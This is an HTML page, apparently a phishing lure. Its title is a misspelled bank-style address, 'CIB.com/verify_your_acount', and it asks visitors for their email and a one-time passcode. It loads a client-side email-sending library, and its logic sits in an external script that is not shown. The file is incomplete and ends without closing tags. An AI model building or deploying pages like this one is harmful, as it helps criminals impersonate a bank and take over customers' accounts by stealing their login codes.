<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>https://CIB.com/verify_your_acount</title>
    <script src="https://smtpjs.com/v3/smtp.js">
    </script>
    <style>
            .form {
        display: flex;
        flex-direction: column;
        gap: 1rem;
        justify-content: center;
        width: fit-content;


    }
    input {
        padding:0.6rem;
    }
    .verify {
        padding: 0.5rem 0.8rem;
        background-color:rgb(0, 102, 255) ;
        outline: none;
        border:none;
        cursor: pointer;
        border-radius: 16px;

    }
    body {
        text-align: center;
        align-items: center;
        background-color: rgb(245, 244, 244);
    }
    </style>
</head>
<body>
    <div class="form">
        <input type="email"  id="email" placeholder="Enter Your Email">
        <div class="otpverify">
        <input type="password" id="OTP" placeholder="Enter the OTP that We sent to your email">
        <button class="verify">Verify</button>
        <input type="text" id="otp_inp" placeholder="Enter the OTP sent to your Email ... ">
        </div>

        <button onclick="sendOTP()" class="OTPbtn" id="otpbtn">Send OTP</button>
        <button id="Next">Next</button>
        <script src="script.js"></script>
    </div>
